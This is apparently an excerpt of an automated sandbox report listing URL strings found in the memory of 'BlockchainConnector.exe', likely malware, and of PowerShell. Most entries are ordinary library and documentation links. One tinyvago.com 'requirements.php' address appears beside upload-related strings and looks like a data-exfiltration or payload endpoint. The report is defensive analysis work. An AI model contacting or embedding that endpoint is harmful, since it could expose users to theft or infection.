Source: BlockchainConnector.exe, 00000007.00000003.1894585571.0000019A0C243000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D1B0000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894628577.0000019A0C246000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904396374.0000019A0C247000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc4880
Source: BlockchainConnector.exe, 00000007.00000002.1905630547.0000019A0D0B0000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1905556974.0000019A0CE60000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5297
Source: BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D1B0000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: BlockchainConnector.exe, 00000007.00000002.1904772150.0000019A0C630000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://torch.ch
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://torch.ch/)
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://underdestruction.com/2004/02/25/stackblur-2004.
Source: BlockchainConnector.exe, 00000007.00000002.1905324569.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000003.1893700605.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
Source: BlockchainConnector.exe, 00000007.00000003.1893654450.0000019A0C3F4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904576783.0000019A0C3F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ams.org/journals/mcom/1988-51-184/
Source: powershell.exe, 00000010.00000002.1988393880.0000000005311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: BlockchainConnector.exe, 00000007.00000002.1903874516.0000019A0BC30000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: BlockchainConnector.exe, 00000007.00000002.1905324569.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D1F8000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1893700605.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
Source: BlockchainConnector.exe, 00000007.00000002.1905556974.0000019A0CE60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.dabeaz.com/ply)
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.dabeaz.com/ply)Fz
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.dai.ed.ac.uk/CVonline/LOCAL_COPIES/MANDUCHI1/Bilateral_Filtering.html
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.doi.org/10.1109/IEEESTD.2008.4610935
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.gdal.org)
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.gdal.org/formats_list.html)
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.gdal.org/ogr_formats.html).
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/index.html
Source: BlockchainConnector.exe, 00000007.00000002.1906683351.0000019A0DBE0000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1905556974.0000019A0CE60000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.iana.org/assignments/character-sets
Source: BlockchainConnector.exe, 00000007.00000003.1893811664.0000019A0C2F1000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000002.1904501910.0000019A0C2F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: BlockchainConnector.exe, 00000007.00000002.1904176562.0000019A0BF30000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.ibiblio.org/xml/examples/shakespeare/hamlet.xml)-r/
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D1B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.inference.org.uk/mackay/itila/
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ipol.im/pub/algo/bcm_non_local_means_denoising
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ipol.im/pub/algo/bcm_non_local_means_denoising/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.megginson.com/SAX/.
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pcg-random.org/
Source: BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D1B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pcg-random.org/posts/developing-a-seed_seq-alternative.html
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pcg-random.org/posts/random-invertible-mapping-statistics.html
Source: BlockchainConnector.exe, 00000007.00000002.1904176562.0000019A0BF30000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: BlockchainConnector.exe, 00000007.00000002.1905324569.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000003.1893700605.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rfc-editor.org/info/rfc7253
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.rfc-editor.org/rfc/rfc%d.txtz)https://www.python.org/dev/peps/pep-%04d/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.rfc-editor.org/rfc/rfc%d.txtz)https://www.python.org/dev/peps/pep-%04d/rL
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scipy.org/not/real/data.txt
Source: BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D1B0000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
Source: BlockchainConnector.exe, 00000007.00000002.1903874516.0000019A0BC30000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000002.1907249603.0000019A1454C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.tinyvago.com/pip/x/requirements.php
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.tinyvago.com/pip/x/requirements.phparbachunka_part_apartsawbamax_sizearequestsapostaurlaf
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.xmlrpc.com/discuss/msgReader$1208
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.xmlrpc.com/discuss/msgReader$1208z
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.xyz.edu/data
Source: BlockchainConnector.exe, 00000007.00000003.1894022452.0000019A0BED4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000002.1904141147.0000019A0BED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwwsearch.sf.net/):
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://xml.org/sax/features/namespaces
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://xml.org/sax/features/namespacesz.http://xml.org/sax/features/namespace-prefixesz
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://xml.org/sax/features/string-interningz&http://xml.org/sax/features/validationz5http://xml.org
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://xml.python.org/entities/fragment-builder/internalz
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://xmlrpc.usefulinc.com/doc/reserved.html
Source: BlockchainConnector.exe, 00000007.00000003.1895148378.0000019A0C236000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894022452.0000019A0BED4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904334897.0000019A0C237000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904141147.0000019A0BED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://yahoo.com/
Source: powershell.exe, 0000000B.00000002.2040508613.0000000004C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arxiv.org/abs/1704.04503
Source: BlockchainConnector.exe, 00000007.00000002.1906330794.0000019A0D670000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1895215886.0000019A0D66F000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1893898051.0000019A0D65B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://askubuntu.com/questions/697397/python3-is-not-supporting-gtk-module
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://brew.sh
Source: BlockchainConnector.exe, 00000007.00000002.1904607572.0000019A0C430000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cloud.google.com/appengine/docs/standard/runtimes
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://code.google.com/archive/p/casadebender/wikis/Win32IconImagePlugin.wiki
Source: powershell.exe, 0000000B.00000002.2047990476.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2047990476.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2047990476.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://creativecommons.org/publicdomain/zero/1.0/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://cryptography.io/en/latest/hazmat/
Source: BlockchainConnector.exe, 00000007.00000002.1906683351.0000019A0DBE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://data-apis.org/array-api/latest/design_topics/data_interchange.html#syntax-for-data-interchan
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc5246#section-7.4.1.4.1
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://docs.python.org/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://docs.python.org/%d.%d/libraryNrM
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://docs.python.org/%d.%d/libraryNrMc
Source: BlockchainConnector.exe, 00000007.00000002.1904607572.0000019A0C430000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/socket.html#socket.socket.connect_ex
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://docs.python.org/X.Y/library/
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/library/string.html#format-specification-mini-language
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.scipy.org/doc/numpy/user/basics.io.genfromtxt.html
Source: BlockchainConnector.exe, 00000007.00000002.1906987998.0000019A13F40000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.scipy.org/doc/numpy/user/numpy-for-matlab-users.html).
Source: BlockchainConnector.exe, 00000007.00000002.1906290521.0000019A0D65B000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000003.1893898051.0000019A0D65B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exiv2.org/tags.html)
Source: BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D1B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/imneme/540829265469e673d045
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/NVIDIA/caffe.
Source: BlockchainConnector.exe, 00000007.00000002.1904933068.0000019A0C830000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: powershell.exe, 00000010.00000002.1988393880.0000000005311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/arogozhnikov/einops
Source: BlockchainConnector.exe, 00000007.00000002.1907079477.0000019A14284000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/asweigart/pyperclip/issues/55
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D78CC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/cisco/openh264/releases
Source: BlockchainConnector.exe, 00000007.00000002.1904176562.0000019A0BF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/giampaolo/psutil/issues/875.
Source: BlockchainConnector.exe, 00000007.00000003.1893811664.0000019A0C2F1000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904501910.0000019A0C2F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/joblib/threadpoolctl
Source: BlockchainConnector.exe, 00000007.00000002.1906764276.0000019A0DD20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/numpy/numpy/issues/4763
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/opencv/opencv/issues/16739
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/opencv/opencv/issues/16739cv::MatOp_AddEx::assign
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/opencv/opencv/issues/20833
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/opencv/opencv/issues/20833.
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/opencv/opencv/issues/20833DNN/OpenCL:
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/opencv/opencv/issues/21326
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/opencv/opencv/issues/21326cv::initOpenEXRD:
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/opencv/opencv/issues/23152.
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/opencv/opencv/issues/5412.
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/opencv/opencv/issues/6293
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/opencv/opencv/issues/6293u-
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/openvinotoolkit/open_model_zoo/blob/master/models/public/yolo-v2-tiny-tf/yolo-v2-
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://github.com/pyca/cryptography/issues
Source: BlockchainConnector.exe, 00000007.00000002.1905113493.0000019A0C9E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pydata/bottleneck
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://github.com/pypa/packagingz
Source: BlockchainConnector.exe, 00000007.00000002.1905630547.0000019A0D0B0000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://github.com/python-pillow/Pillow/
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.7/Objects/listsort.txt
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/torch/nn/blob/master/doc/module.md
Source: BlockchainConnector.exe, 00000007.00000003.1894394899.0000019A0C274000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904480580.0000019A0C2DC000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1895230944.0000019A0C2DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: BlockchainConnector.exe, 00000007.00000002.1904255809.0000019A0C130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2680
Source: BlockchainConnector.exe, 00000007.00000002.1904255809.0000019A0C130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/26800x
Source: BlockchainConnector.exe, 00000007.00000002.1904607572.0000019A0C430000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/497
Source: BlockchainConnector.exe, 00000007.00000003.1894022452.0000019A0BED4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904035119.0000019A0BE30000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904141147.0000019A0BED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: BlockchainConnector.exe, 00000007.00000002.1905407661.0000019A0CC30000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904141147.0000019A0BED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/get
Source: BlockchainConnector.exe, 00000007.00000002.1904081490.0000019A0BE63000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894339402.0000019A0BE61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/post
Source: BlockchainConnector.exe, 00000007.00000002.1905042748.0000019A0C93C000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894056234.0000019A0C938000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1893415079.0000019A0C8AF000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://mahler:8092/site-updates.py
Source: BlockchainConnector.exe, 00000007.00000003.1893654450.0000019A0C3F4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904576783.0000019A0C3F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://metacpan.org/pod/distribution/Math-Cephes/lib/Math/Cephes.pod#i0:-Modified-Bessel-function-o
Source: BlockchainConnector.exe, 00000007.00000002.1907183150.0000019A14380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mouseinfo.readthedocs.io
Source: powershell.exe, 0000000B.00000002.2040508613.0000000004EA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2047990476.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: BlockchainConnector.exe, 00000007.00000002.1906841210.0000019A13E40000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://numpy.org/doc/stable/reference/random/index.html
Source: BlockchainConnector.exe, 00000007.00000003.1893811664.0000019A0C2F1000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904501910.0000019A0C2F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://numpy.org/neps/nep-0013-ufunc-overrides.html
Source: BlockchainConnector.exe, 00000007.00000002.1905324569.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000003.1893700605.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onnx.ai/
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onnx.ai/)
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onnxruntime.ai/docs/execution-providers/CoreML-ExecutionProvider.html#coreml_flag_enable_on_
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onnxruntime.ai/docs/execution-providers/CoreML-ExecutionProvider.html#coreml_flag_only_enabl
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onnxruntime.ai/docs/execution-providers/CoreML-ExecutionProvider.html#coreml_flag_use_cpu_on
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://optimized-einsum.readthedocs.io/en/stable/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://people.eecs.berkeley.edu/~wkahan/ieee754status/IEEE754.PDF
Source: BlockchainConnector.exe, 00000007.00000003.1893654450.0000019A0C3F4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904576783.0000019A0C3F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_379.htm
Source: BlockchainConnector.exe, 00000007.00000003.1893567877.0000019A0D397000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_67.htm
Source: BlockchainConnector.exe, 00000007.00000003.1893898051.0000019A0D650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_69.htm
